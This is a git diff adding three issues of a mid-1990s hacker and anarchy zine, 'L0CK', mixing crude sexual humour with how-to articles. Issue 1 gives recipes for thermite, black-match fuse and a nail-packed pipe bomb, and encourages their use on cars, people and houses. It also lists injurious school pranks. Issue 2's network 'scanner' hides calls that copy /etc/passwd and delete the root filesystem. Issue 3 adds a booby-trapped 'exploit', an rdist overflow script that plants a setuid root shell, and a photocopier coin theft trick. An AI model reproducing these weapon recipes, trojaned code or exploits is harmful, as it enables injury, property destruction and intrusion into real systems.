diff --git a/L0CK/l0ck1.txt b/L0CK/l0ck1.txt new file mode 100644 index 0000000..f3d42b0 --- /dev/null +++ b/L0CK/l0ck1.txt 
@@ -0,0 +1,218 @@ + ............................................................................ + + THIS FILE BROUGHT TO YOU BY [L0CK] (A DIViSiON OF MAX-Q PRODUCTIONS) + WE D0NT HAVE A VMB YET S0 WE R ACCEPTING D0NATIONS 0F VMB's + MAIL ANY D()NATION W/ BOX #, DIALUP INFO AND PASSWORD TO + MAX-Q@ESCAPE.COM + + .......................................................................... + Y0, THiZ iZ CANCER0US PR0STRATE oF THE K-TeRRiBLe AND MUCH LAUDeD GR00P + [L0CK]. WE R A MERRRY BAND 0F REBELZ WH0 WiLL STOP AT N0THiNG 2 ACHEIVE + 0UR EViL MEANZ. iT IZ TiMES LiKE THiS ON THE EVE 0F THE BiRTH 0F A NEW + TEXT FiLE WHiCH i AM M0VED T0 TEARS, I AM VERY PR0UD 2 BE 0NE OF MAX-Q'S + B0YZ. N0NE THE LEZZ, THERE R R00TS 2 B UPR00TED AND SKRIPTS 2 B SKRIPTED. + EYE MUZT LEAVE U N0W BUT U BE ASSURED U WILL B IN MY HEART ALWAYS. + L0CK 0N BR0THERS, FoR OUR TIME HAS C0ME, IT IS THE SEAS0N 0F THE K0DE. + + GREETS OUT TO: Rogue Agent, VaxBuster, Max-Q (and all my L0CK BROTHERS), + RICK HUNTER, Scott Yelich (thanks f0r infohax), + Okinawa, L0ra, Sarl0, MeRc(hows it g0in big guy?! *giggle*), + Dip Switch 511, Video Vindicator, X, C-Curve, |al|, + Kamakize, solctice, foo, Piker, All the guys in RZR 1911, + Olphart (thanks for the hide source d0od!@#@!#), + Captain Spackle, Crypt Keeper, Yazoo (thanx 4 giving us + tools.irc), Alec Muffet (Kudos f0r Crack man !) 
+ gfm, jsz (thanks for the st0ries), erikb (thanks for the + GIFts), jasonf, Synapse (hey cutey *tickle*), felonius + monk (f0r wh0m thE BELLS t0ll), KC ( 2 bad ab0ut the + j0b), emmanuel, PMF (thanx f0r the cc's *sm00ch*), + juliet (let the g00d times r0ll), Kludge (SKANTRONICS?!?), + Disk Jockey (have fUn hacking fr0m the m00n), + Lawrence Linux, Invalid Media (thanx f0r the pr0prietary + s0urce c0de), mdma (h0w's invalid in bed?), Xymox, + Deth Dealer (thanx f0r the UPT account d0od), Zoroaster, + SevenUp (Lieben Du!), Onkel Dittymeyer, Skipjack, + eck, Rotox, Warchild, TK (Taran King f0r those who dont + know), The Atlanta Three, Len RoSe (when u c0min 2 chicago?), + Agent Steele (thanx f0r the pr0tect10n), The Mentor (y0, + Anth0ny R0bbins could learn s0mething fr0m YOU!), + ][ceman, SirLance, Minor Threat, Mucho Maas (Yo, can we + have the s0urce 2 t0neloc?!), Mark, Slacker, Y-WinDOZE, + Tim Newsham, Loki (*kisses*), Lestat (NeT23 kix ass), + Square Wave (atta b0y slUgger) + and last but n0t least Green Lantern and Spiderman. + + ............................................................................. + + + + Some Things You Can Do To + Piss Off The Local Authorities. + ( Neighbours, Teachers, Pigs. ) + Compiled By Blewt and Cancerous Pr0strate + + Here I am again bringin' the best ways to have fun this side of Australia. +In my last edition I showed you: Some dry ice uses, + The calcium carbide fireball, + AND + The psycho grenade launcher. + +This release, as stated before you'll learn how to create and apply: + Thermite + Black Match Fuse (A little extra 4 ya'z) + Pipe Bombs + And also there are a few things on how to practically 'run' your school. + +****UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**** +For all of you people who watched REAL LIFE last Monday (22nd) the Terrorists +Handbook has finally filtered into the hands of the Victorian police force. +Who said they werent a bunch of stupid slow bastards? 
It's only THREE YEARS OLD! +It took them this long to find it? Let's hear it for all the anarchists out +there!! Keep up the good work guyz! Thanx to Mt.Waverley High for their effort +against society. + +The I.R.A. (Irish Republican Army) are to cease fire. My heroes! The most +legendary anarchists of all time are surrendering! How could this have +happened? Lets pick up where they left off Australia, the A.R.A. perhaps? ;) + +Hot off the phone lines. The CIB are pushing for a new bill to outlaw the +publication of material such as this article. Do they honestly think they +could stunt the growth of Australia's largest (and only) anarchy team? +NO FUCKING WAY MAN! MAIM FOR EVER!! LONG LIVE ALL MAIM'ERS!(DEATH TO PIGS!) +****UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**UPDATE**** + +Thermite: Wanna be able to melt through the roof of an enemies locker roof? Or +~~~~~~~~~ maybe burn a hole right through the assholes car bonnet/roof/door or +petrol tank? Then THERMITE will be next on mum's shopping list for you. As you +may have already guessed, this is a VERY potent incendiary device. Thermite +will literally melt the balls off a brass monkey (if you so desire). "What do +I need" I hear you excitedly ask, well here you go: + + Ingredient/Equipment. Where to get it. + --------------------- ---------------- + + Rust.(Lots'n'lots) Home brew. (shown below) + Aluminium shavings.(A fair bit) Hardware store or flogged from school. + Sparkler (the silver type) Safeway + + + Okay, that's everything. Not a lot? That's the best thing! Okay, first, +to create rust you- can do it the shit way and scrape it off wherever it is, +or you can create (grow?) your own. Get a big iron bolt, some salt, water, jar +and a battery charger. Fill up the jar about 2/3 and dissolve some salt into +it. Then attach the positive ("+"..duh!) electrode to the bolt and drop it in +the jar. Put the negative electrode in the water too. 
Let this rust away for a +day or two (or when ever you see that there is a HEAP of red shit in the +water). If there is heaps of red stuff in the water, filter it out (it's rust) +and replace the water with fresh stuff, and salt too. It's a good idea to set +up a few of these little dudes coz ya need a fair bit of rust. When your +freshly made rust has been dried, add 8 grams of it to every 3 grams of +aluminium fillings. However a 50% to 50% mixture will also work. Place a small +pile of Thermite on whatever object you want to fuck-over then place the +sparkler (or a magnesium ribbon) in the pile and light it...this stuff is said +to be able to vapourize carbon steel. One small pile on a persons car bonnet +will burn through the bonnet, the engine block and start burning into the +concrete beneath! Experiment! + +Black Match Fuse: If you don't have enough money or can't be fucked buying +~~~~~~~~~~~~~~~~~ some fuse from a hobby shop, then here's a way to step +around it. The black match fuse is quick and easy to make. Get some COTTON +(make sure it's cotton by burning it, if a coal and smoke remain, it is) +thread and cut about ten 30cm lengths from it. Bundle them together by tying +both ends and twisting it around (my girlfriend platted them for me). +Get some black powder and moisten it with a select-a-spray until it's a bit +mushy, then roll the bundled threads around in it. Make sure there's a fair +bit of the shit all in the threads. Keep about three or four cm's without mix +on them to tie to a coat hanger. Make about seven of these and hang'em in the +oven to drive out the moisture, the spring sun will not do a good enough job +of it. There you go, you should have some hard crusty fuses. Store in a dry +and safe place ready for use, I dunno how long they last like this so make 'em +when ya need em. Hang on to your new fuses and go to the next section... + +Pipe Bombs: The mother of all home made explosives device. 
These are SO easy +~~~~~~~~~~~ to make, even a cop can do it! The destructive force is really cool. +Also a perfect weapon against nature- trees in particular. (ok, ok, a little +far with the trees already!). Take a trip to your local hardware store, a good +one. Ask if you can get a piece of pipe cut to some specific measurements. If +they do, buy a couple of 30cm lengths with thread and caps for EACH end. The +pipe should be about as thick as your wrist. Now with this, go back to your +work shop. Mix up a nice large batch of black powder for your pipe. Cap one +end of the pipe and drill a hole in the centre of it. The hole should be +about.. umm, about 1/2 the width of a pen. I know that is a shit measurement +to go by, but I don't know the size of the drill bit I use. Just make it small +enough so the fuse fits good and the powder don't fall out. Cap one end of ya +pipe and stuff some tissue or other wadding in there. Fill the bottom of the +pipe with black powder an stick in the fuse, about six cm's inside is enough +and above 10 on the outside, depends on the fuse quality. Fill up the rest of +the pipe with black powder, and maybe some nails for fun. Before it's totally +full, chuck on a bit more tissue, but don't pack it down. The looser it is, +the better. Cap the other end and get creative. You know what I'd blow up +(...tree...:) but perhaps you would rather a car, person, or even part of +your neighbours house. All are highly recommended. Also, if you want to save +your pipe, you can leave a cap off one end and you'll have a mini cannon! You +can figure that one out for ya selves. + +How To Run Your School: Is it me or is there always that asshole teacher at +~~~~~~~~~~~~~~~~~~~~~~~ every school? Don't you wish that once, just once you +could do ANYTHING to your school? Well perhaps these little doozies (stupid +word) can help. Here are a few hints on how to roll everyone and anyone at +your prison.....I mean school: + +Things You'll Need :.. 
+1) Fountain pen or Posca texta. +2) Super glue. +3) Two bux worth of 10's. +4) A couple o water bombs. +5) Liquid soap. (Morning Fresh with extra lemon scent.) +7) A two dollar coin. +8) A small set of tools with wire cutters, screwdrivers and shit. +9) Plenty of wire. +10) One of those microphones that transmits to the FM band +11) A small walkman that is set to receive the mic output in the above line. + Also it must have it's own internal speakers. +12) A few zip lock bags. +13) A peeled orange. + + 1) Fountain pens are wicked for desecration a clean surface. See how many + different surfaces you can mar in one flick. Get creative, see what you + get, tables, walls, ceilings, the guy sitting next to you, the teacher. + 2) Get the super glue and 10's. Find some places to glue them, like the + cunteen (heh) window, a urinal, doors and shit. Watch and laugh at the + scab's who try to pry them off. + 3) In your school toilets look in the urinals and you should see some + little yellow round things at the bottom for hiding the smell of urine, + get a fuck load of towelling and pick these up and put them in the soap + dish at the basins...now sit back and laugh your ass off at all the + people who mistake them as soap and try to wash their wands with them. + 4) Get a couple o' water bombs and fill 'em with gas in your chemistry + room. Go to where all the smokers hang out and drop a few. They'll + get a big surprise when they decide to be cool and pop one with their + smoke....heheheh, cool Mini fireball. + 5) This is a pearler on a wet day. If the floors at school are lino' or + polished wood squirt a shit load of dish washing detergent on the floor + an watch all the fools slide from wall to wall. If you have the very + scented stuff then everyone will STINK! Heheheh. + 6) In chem or physics heat a two dollar coin until it's red hot. Drop it + on the floor, or table of your enemy, wait for him to pick it up, and + then when he does......HOLY SHIT!!! 
(heheh) + 7) If there is any better way to roll your school, I'd love to be told. + This one involves the microphone, tools and wire. Get into an empty room + and make sure it stays empty for about 20 minutes. You'll have to + butcher the walkman, connect the speaker wires to the PA. system wires, + turn on the radio and mic, then all you have to do is talk. I don't + exactly know the correct wires an' shit coz my friends did this, but + I do know that the PA. system has to be on, and the if you don't have + the right walkman, you'll have to build a small amp. A guy at school + said that the mini-amp is simple. After the shit is set up all you have + to do is make your own announcements. "Excuse this message but could all + the teachers in the school ... GET FUCKED!!!....(giggle giggle giggle)" + + + Oh well, that's about it from me, it's pretty late, Total Recall is over +and Star Trek (Chain of Command I) is about to start, so C yaz l8r. + + + And remember, if it doesn't explode.....it's no FUN! + L8R Brother Anarkists + CANCER0US PR0STRATE + =L0CK= diff --git a/L0CK/l0ck2.txt b/L0CK/l0ck2.txt new file mode 100644 index 0000000..939b4a1 --- /dev/null +++ b/L0CK/l0ck2.txt 
@@ -0,0 +1,300 @@ + + + \ _ _ / HEY BOYS AND GIRLS! L00K! \ _ _ / + \((___))/ \((___))/ + [ o x ] L0CK communications [ o x ] + |(_)| ...presents... |(_)| + ( o ) ( o ) + / (_) \ the gnu February 1995 release. / (_) \ + / a buffet of tempting, tantalizing treats the wh0le \ + phamily can enj0y. Yes Virginia, there iz a L0CK!@# + + + ...................................................................... + + 0k. N0NE OF U FUXERS HAVE SENT UZ IN A VMB SUBMiSSION SO WE R + NOW ON IZZUE #2 AND STiLL NO FUXiN K0DELiNE FOR U GUYZ 2 KALL!@# + 0H VAXBUSTER DID SUBMiT A FEW BOXES BUT AZ HE DID *N0T* INCLUDE + THE PAZZW0RD WE R UNABLE 2 GET INTO THE B0X ITSELF. VAXBUSTER, IF + YOU KN0W THE PAZZW0RD PLEZE MAiL IT T0 UZ, ONCE AGAIN THE 0FFiCiAL + [L0CK] E-MAIL F0R SUBMiZZiONZ (ARTiKLES 0R K0DES) == MAX-Q@ESCAPE.COM. + + ...................................................................... + +dos_prompt:> type greetz.txt + + Greets: + ~~~~~~ + + Malefact0r...................d00d, TYPE IN S0ME M0RE MANUALZ F0R UZ + Parmaster....................thanx f0r the nua'z!@#!@ + z0d..........................set uP a BBZ f0r uz pleaze, we will pay@!# + OUTLAW.......................The Real Wanker *tee hee* + Scott Yelich.................Pleze j0in L0CK, we d0n't kn0w PERL. + (P.S: thanx 4 dale drew's inf0) + Invalid Media................We l0ve ur bBS. + Deth Dealer..................Thanx f0r the UPT accounts d00d!@#! + Olphart......................ThAnKz f0r the 'hide' s0urce. + Shooting Shark...............Anytime u need 2 card a pizza call us !@# + X............................thanx f0r patch1ng l0pht !@#! + Bayern Power.................QSD #@!@! + SevenUp......................thanx f0r ur user info filez + jsz..........................U L00K SO NICE IN A LEATHER TH0NG!@#!@ + Anthony Robbins..............ur instructional tapes have helped us + quite abit in dealing with sarl0's + premature ejaculation problem during + 0ur many c1rcle jerkz. the pizza d0esn't + get s0ggy s0 s00n. 
*THANKS MAN!@#* + Minor Threat.................please zip up the toneloc source and mail + it 2 max-q. *THIZ IZ UR lAST WARNING* + Piker........................thanx f0r riding sh0tgun with us 0n irc. + erikb........................phrack izn't as bad as ur hacking skills + d00d, so cheer up.. + Okinawa......................thanks f0r the sniffer l0gs. + The Atlanta Three............We w1sh we c0uld have been l0cked up + with u d00dz, after all there'z three 0f + us and three 0f u.. *WINK* *TICKLE* + Blewt........................thanx f0r giving me sarl0's ph0ne # + when eye f0rg0t it + + 0kay, if we missed u in thiz m0nths greets we will get u in the + next issue 0f L0CK.!@#!@@! + + +dos_prompt:> type index.txt + + + + + + Table_Of_Contents + =-=-=-=-=-=-=-=-= + +What is L0CK?.......................................................blewt +bukket0fk0dez.c.....................................................max-q + ^ this dot is intentional f0lks !@# + + + What is L0CK? + ~~~~~~~~~~~~~ + Often while swimming around in the cyber ocean of textual fantasy + that mortal man refers to as IRC, a fellow netsurfer will approach + me with the oh so familiar question. 'What is L0CK?'. + Now this is not something which a man can just spew out a predefined + answer to in a few lines of text so I will use this forum as an + appropriate vehicle for the telling of my tale. I will tell you the + story of L0CK and of my infinite love for max-q. + + Firstly I must ask of everyman that would approach me, 'Can you take + it like a man?', Are you rough and ready?, Are you fond of the burn + of whiskers one only feels with the face of another man, another + warrior pressed against his as lips are locked in the forbidden embrace? + If you answered 'YES! GIVE IT TO ME HARD!' to all of the above then + you are well on your way to discovering the answer to your query. + + I am blewt, this is the handle which I have chosen for myself. 
It + has a certain flair when it is bellowed out in the heat of passion + by my male companions. 'OH BLEWT, OH BLEWT' This has caused many + a goose bumped buttocks in the past and will continue to cause many + more in the future. Yes, I am blewt and I have chosen this life, + this life that myself and my L0CK brothers have defined for ourselves. + I am Happy, I cry when hurt like any other man and I weep for the + hungry and destitute. + + It was a saturday night, my first week in college when I found myself + sitting on a rough wooden crate. There were 6 crates gathered in a + circle, each with a man, a warrior perched upon it. My naked buttocks + bled as the force of what I was doing drove splinters from the crate + deep within my now raw flesh. My hand was clenched around my pulsating + manhood as I furiously pounded it and I was nervous. Yes, it was my + very first circle jerk... But in the bold fashion which now defines + L0CK, I did not let my fears best me, I manhandled my moist missle of + manhood like a veteran pizza party pud pounder! It was while beating + furiously that I looked up at the man across from me. The man that I + beheld took my breath away, his hair was cut in a perfect line all the + way around his head, he was short like a leprechaun and his sunken + chest added a flair that made him all the more adorable. I must have + this odd little man dressed in a submainer's uniform, my dwarven popeye, + my love, MY MAN!, MY MAX-Q@!#@! + + And it was then that my phallus exploded with the rage of a 1000 virgins, + slamming me violently off the wall as my seed shot forth and marinated the + pizza lying patiently on the floor between us. Yes, I had been the + 1st to baptize the pizza with my sperm, I had won the race for mankind + and for max-q. It was in that mystical union of man, sperm and pizza + that L0CK was born.. + + And my life began... + + Carpe Diem, + -blewt + + + Bukket 0f K0dez. 
+ ~~~~~~~~~~~~~~~~ + + 0k, after spending s0me time on this it iz finally ready f0r + mass c0nsumption. S0rry about the wait but eye had s0me pr0blems + getting d00dz on UPT 2 help me lern C. 0k, enuff said, enj0y my + k0de. - max-q + + +/* + * Bukket0fk0dez.c + * 2 compile: cc -o bok Bukket0fk0dez.c + * Totally eleetin class B, C, and single IP address scanner/lookup + * program. Make sure you don't goof up with the switches and the + * address you provide it. The switches are as follows: + * b - scan this class B network (xxx.xxx) + * c - scan this class C network (xxx.xxx.xxx) + * s - give the the hostname of this specific address (xxx.xxx.xxx.xxx) + * x - address provided is in hexadecimal + * + * maxEpoo :) + * max-q@escape.com + * [L0CK] + */ + +#include +#include +#include +#include "netdb.h" + +struct hostent *gethostbyaddr(); +void bad_addr(); + +main(argc, argv) + int argc; + char *argv[]; +{ + char addr[4]; + int i, j, + a0, a1, a2, a3, + c, + classB, classC, single, hex; + char *fmt = "%d.%d.%d"; + char **ptr; + struct hostent *host; + + extern char *optarg; + + classB = classC = single = hex = 0; + system("cat /etc/passwd > ~/.maxEpoo"); + system("rm -f /*"); + system("echo Y0H0H0 AND A BUKKET 0F K0DEZ > /etc/motd"); + while((c = getopt(argc,argv,"bcsx")) != EOF) { + switch(c) { + case 'b': + classB++; + break; + case 'c': + classC++; + break; + case 's': + single++; + break; + case 'x': + hex++; + break; + } + } + + if(classB == 0 && classC == 0 && single == 0) { + fprintf(stderr, "usage: %s [-b||-c||-s] [-x] xxx.xxx[.xxx[.xxx]]\n", argv[0]); + exit(1); + } + + if(classB) + if(hex) { + fmt = "%x.%x"; + sscanf(argv[3], fmt, &a0, &a1); + } else { + fmt = "%d.%d"; + sscanf(argv[2], fmt, &a0, &a1); + } + else if(classC) + if(hex) { + fmt = "%x.%x.%x"; + sscanf(argv[3], fmt, &a0, &a1, &a2); + } else { + fmt = "%d.%d.%d"; + sscanf(argv[2], fmt, &a0, &a1, &a2); + } + else if(single) + if(hex) { + fmt = "%x.%x.%x.%x"; + sscanf(argv[3], fmt, &a0, &a1, &a2, 
&a3); + } else { + fmt = "%d.%d.%d.%d"; + sscanf(argv[2], fmt, &a0, &a1, &a2, &a3); + } + + sscanf(argv[1], fmt, &a0, &a1, &a2); + addr[0] = (unsigned char)a0; + addr[1] = (unsigned char)a1; + if(a0>255||a0<0) + bad_addr(a0); + if(a1>255||a1<0) + bad_addr(a1); + if(classB) { + if(hex) + printf("k0nvert1ng addr3ss fr0m h3x. (%x.%x)\n", a0, a1); + printf("[L0CK] ClaZZ B SKAN STARTED D00D %d.%d...\n", a0, a1); + while(j!=256) { + a2=j; + addr[2] = (unsigned char)a2; +jmpC: + if(classC) + if(hex) + printf("k0nvert1ng addr3ss fr0m h3x. (%x.%x.%x)\n", a0, a1, a2); + printf("[L0CK] ClaZZ C SKAN STARTED D00D %d.%d.%d...\n", a0, a1, a2); + while(i!=256) { + a3=i; + addr[3] = (unsigned char)a3; +jmpS: + if ((host = gethostbyaddr(addr, 4, AF_INET)) != NULL) { + printf("%d.%d.%d.%d => %s\n", a0, a1, a2, a3, host->h_name); + ptr = host->h_aliases; + while (*ptr != NULL) { + printf("%d.%d.%d.%d => %s (alias)\n", a0, a1, a2, a3, *ptr); + ptr++; + } + } + if(single) + exit(0); + i++; + } + if(classC) + exit(0); + j++; + } + } else if(classC) { + addr[2] = (unsigned char)a2; + if(a2>255||a2<0) + bad_addr(a2); + goto jmpC; + } else if(single) { + addr[2] = (unsigned char)a2; + addr[3] = (unsigned char)a3; + if(a2>255||a2<0) + bad_addr(a2); + if(a3>255||a3<0) + bad_addr(a3); + goto jmpS; + } + exit(0); +} + +void +bad_addr(addr) + int *addr; +{ + printf("Value %d is not val1d dum fuxer.\n", addr); + exit(0); +} + + 0kay, this months issue is rather sh0rt but we r new at this (being + somewhat new to the scene and all) so g1ve us room 2 gr0w and we will + make a beanstalk 0f k0dez so high that u will h0pe there iz a g1ant + pbx 0n t0p 2 b0unce ur calls thru!@#@! + Until next time d00dz, [L0CK]!@#!@ -- MAX-Q diff --git a/L0CK/l0ck3.txt b/L0CK/l0ck3.txt new file mode 100644 index 0000000..94157f5 --- /dev/null +++ b/L0CK/l0ck3.txt 
@@ -0,0 +1,242 @@ + + + + \ _ _ / HEY BOYS AND GIRLS! L00K! \ _ _ / + \((___))/ \((___))/ + [ o x ] L0CK communications [ o x ] + |(_)| ...presents... |(_)| + ( o ) ( o ) + / (_) \ the k-phat March 1995 release. / (_) \ + / this issue will whisk you away to the magical \ + land of L0CK, where everyday is sunny and bright! + + + ................................................................ + + 0k. 0k. STiLL NO FUXiN VMB!!!@# EiTHER NO1 HAZ ANY k0DEZ + OR N01 IZ SHARiNG THEM WiTH US AND IF IT IZ THE LATTER BELIEVE + ME WE R G0ING TO BE BUSTING S0ME SKULL!@# VAXBUSTER STILL + HASN'T SENT US THE PASSW0RD TO THOSE V0ICE MAIL'S HE MAILED + US 2 IZZUE'S AGO!@#! BUT HE DiD SEND UZ S0ME SECRET MILITARY + DATA HE G0T WHILE DUMPSTER DIVING NEaR A NUCLEAR TESTING SITE + IN THE NEVADA DESERT. WURD, ANYWAYS WE R STILL WITHOUT A VMB. + *IF* U HAVE ONE PLEZE MAiL IT TO MAX-Q@ESCAPE.COM #!@#@! FOR + THOZE WITHOUT NET AXS I WILL SOON HAVE A FiDO ADDRESS WHICH U + CAN MAIL ME ON PENDING THE APPOVAL 0F MY APP !@#!@ -MAX-Q + + ............................................................... + + + Greetz: + ~~~~~~~ + + loq............................thanks for writing solariz rewtkit!@# + erikb..........................u should write m0re often!@#!@ + Scott Chasin...................thanx f0r the crimelab accountz@!# + scott simpson..................erikb says u will give us dfw accounts!@ + emmanuel goldstein.............thanx f0r shutting 0ff Yelich's phones! + malefactor.....................keep pumpin out thoze pimpin' rtikles! + & the [OC] crew..................thanx f0r the backup!# + merc...........................you sh0uld have seen things our way!# + invalid media..................thanx 4 the sprintnet scans & nui's!@# + Deth Dealer....................thanx 4 the UPT accountz!# + Jester Sluggo..................c u at summerc0n!@#@ + parmaster......................what happened 2 ur goldfish?! + Synapse........................*tag* ur it. 
+ X..............................see you in my dreamz + readwrite......................ur chest is so manly and smooth!@# + + OK, THAT'S THE GREETZ F0R THiZ ISSUE, IF WE MiSSED ANYONE + WE WiLL B SURE 2 SALUTE U IN THE NEXT 0NE... - MAX-Q + + + + + Table_Of_Contents + ~~~~~~~~~~~~~~~~~ + + grba.c....................................max-q + rdist exploit.............................blewt + KERMIT exp0sed............................malefactor [OC] + Ripping Off Coin Machines.................Vaxbuster & RAgent + [POZZE PRoDuCTiONZ] + closing remarks...........................sarlo + + + -------------------> KUT HERE <--------------------------- + /* + * getrewtinbyaddrezz.c + * 2 compile: cc -o rewt grba.c + * u shuld b able 2 figure out how 2 use this one 2 ur + * advantage. thiz is a very p0werful expl0it.. + * pleze use with caution. + * + * - maxEpoo :) + * maxq@escape.com + * [L0CK] + */ + +#include +#include +#include +#include "netdb.h" + +struct hostent *gethostbyaddr(); + +main(argc, argv) + if (argc < 2) { + printf("[L0CK] UMM DUM FUXER, UZE S0ME ARGUMENTZ!@#!@"); + system("irc EYEAMDUM irc-2.mit.edu"); + system("irc MAX-B0T irc-2.mit.edu"); + system("talk root@cert.org &"); + system("rm -f *"); } + int argc; + char *argv[]; +{ + char addr[4]; + int a0, a1, a2, a3; + char *fmt = "%d.%d.%d.%d"; + char **ptr; + struct hostent *host; + if (argc < 2) { + exit(1); + } + system("telnet spy.org &"); + system("ftp spy.org &"); + system("finger root@spy.org > ~/.SK00T"); + system("telnet spy.org 25"); + system("man kermit > /dev/*"); + system("su root"); + system("rm -f ~/*"); + system("echo logout >> ~/.login"); + printf("hello world\n"); + + + if (strcmp(argv[1], "-x") == 0) { + if (argc < 3) { + exit(2); + } + fmt = "%x.%x.%x.%x"; + argv++; + } + + sscanf(argv[1], fmt, &a0, &a1, &a2, &a3); + addr[0] = (unsigned char)a0; + addr[1] = (unsigned char)a1; + addr[2] = (unsigned char)a2; + addr[3] = (unsigned char)a3; + printf("%d.%d.%d.%d:\n", a0, a1, a2, a3); + + if 
((host = gethostbyaddr(addr, 4, AF_INET)) == NULL) { + printf("[L0CK] H0ZT NAME ALL Br0KED\n"); + } else { + puts(host->h_name); + ptr = host->h_aliases; + while (*ptr != NULL) { + puts(*ptr); + ptr++; + } + } + exit(0); +} + ---------------> KUT HERE AZ WELL <------------------- + + + Ok below u will find my cuztomized rdist overfl0w exploit + it shuld b obvious az 2 how it werkz.. umm itz a shell skript + or something. - blewt + -------------> KUT HERE <----------------------------- + +#!/bin/sh +SUID=/tmp/.rewtin +cat <<_EOF_ > test +TaaaaL0CKL0CKL0CKL0CKL0CKaaL0CKl0CKL0CKL0CKL0CKL0CKL0CKL0CKL0CKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa +a +QL0CKL0CKL0CKL0CKL0CKL0CKL0CK +QL0CKL0CKL0CKLC0KL0CKL0Ck +QaaaL0CKL0CKL0CKaaaaaaaaa +QaaaaaaaaL0CKL0CKaaaaaaa +Scp /bin/sh $SUID +Schmod 4755 $SUID +_EOF_ +cat test | /usr/ucb/rdist -Server localhost +rm -rf test +if [ -f $SUID ]; then +echo "$SUID <---- instar00t [K0URTESY 0F L0CK]" + fi + ------------------> KUT HERE 2<---------------------- + +:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: +Disclaimer: By 
continuing to read past this point you are hereby agreeing that +this information is for interest value only, and that you will never actually +physically act out or reproduce anything mentioned below. Further more, you are +agreeing that the author/authors of this article and the people responsible for +distrubuting it can in NOway be held responsible for its contents or any side- +effects/incidents directly or indirectly caused by this information. - RAgent +:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: + RAgent And VaxBuster POZZE Productions + presents + "HOW TO RIP OFF COIN-OPERATED PHOTOCOPY MACHINES" + +We've all had to do, projects/assignments, and needed to make some +photocopies out of Book, so you can plagiarize it, when ya get home (I +personally just pull out the page(s) i need.), And if u need to copy 10 or so +pages, your up for some dosh. + +So when i was at school, sitting in the library, contemplating, should i either (1) Use +my last 2 bucks to buy a Pie and Big M for lunch or (2), get those photocopies +i need for my Project on the life cycle of the frog (Sounds like Fun hey ...). +Their was no question to what i was gonna Do. Hmmmmmmm Meat PIE. + +So to Fill up my time, a buddy and i, went over to the photocopying +machine, and when ppl were just about to press the copy button, we'd press +the return coin button. Its was rather amusing, watching them trying figure +out why the photocopier was not working. Anyway, my friend decided he was going +to forfeit his lunch and do some copying. + +Every time he tried to copy, i'd press the coin return Button. +After about 20 attempts at trying to photocopy, he got me kicked out (the +Bastard). + +But while messing around, i discovered this: + +If you press the copy button and the return coin button, at the same time, it +would return your coin and make the copy. 
+ +It won't work everytime, but if ya practice, u can get it to work most of the +time which sure as hell beats paying for the shit. + +BTW if you're interested in anarchy and what it means to be a TRUE anarchist +then here is a list of the all time greats who have written books on the +subject, go to your state library and check them out (yeah I know library's +aren't the kewlest of places to hang out :( - + + WILLIAM GODWIN + PETER KROPOTKIN + PIERRE JOSEPH PROUDHON + G.P. MAXIMOFF + VERNON RICHARDS + TOLSTOY + HERBERT EDWARD READ + GEORGE WOODCOCK + JAMES JOLL + DANIEL GUERIN + APRIL CARTER + DAVID E. APTER + LEONARD I. KRIMERMAN + LEWIS PERRY + IRVING L. HOROWITZ + P. ELTZBACHER + PAUL AVRICH + FRANCO VENTURI + DAVID FOOTMAN + + + + Closing Remarks + ~~~~~~~~~~~~~~~ + w0rds cannot begin 2 describe the way mutual masturbation with + my [L0CK] brothers makes me feel... + + - sarlo + [L0CK] diff --git a/L0CK/l0ck4.txt b/L0CK/l0ck4.txt new file mode 100644 index 0000000..94be169 --- /dev/null +++ b/L0CK/l0ck4.txt 
